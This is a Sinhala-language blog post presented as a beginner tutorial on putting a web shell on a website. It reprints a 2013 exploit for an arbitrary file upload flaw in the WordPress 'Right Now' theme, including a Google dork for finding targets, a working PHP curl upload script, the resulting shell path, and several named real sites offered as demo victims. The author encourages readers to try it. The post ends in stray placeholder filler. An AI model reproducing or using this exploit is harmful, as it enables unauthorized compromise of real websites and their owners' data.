ඔන්න මේක පොඩි ටියුට් එකක්. Website එකකට shell එකක් දාගන්න විදිහ තමයි දාන්න යන්නෙ. සමහරු නම් දන්නවා ඇති. මේක නොදන්න අයට. කරලා බැලුවට කමක් නෑ, හැබැයි Elite_x, Cryp70n, www.synkoda.com කියන නම් 3 ගාවන්න තහනම් ඈ.
මෙන්න වීඩියෝ එක.
###############################################################
# Exploit Title: WordPress Right Now theme - Arbitrary File Upload Vulnerability
# Author: Cryp70n
# Date: 10/31/2013
# Category: webapps/php
# Google dork: inurl:wp-content/themes/RightNow/
###############################################################
= = = = = = = =
1)Exploit =
2)Real Demo = http://monroemartincomedy.com//wp-conten...index.html
= = = = = = = =
1)Exploit :
= = = = = =
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
2) Exploit demo :
= = = = = = = = =
http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
# #### #### #### #### #### #### #### #### #
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php
# #### #### #### #### #### #### #### #### #
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.
බැලුවද?
Comment එකකුත් දාගෙනම යමු නේ.....
ConversionConversion EmoticonEmoticon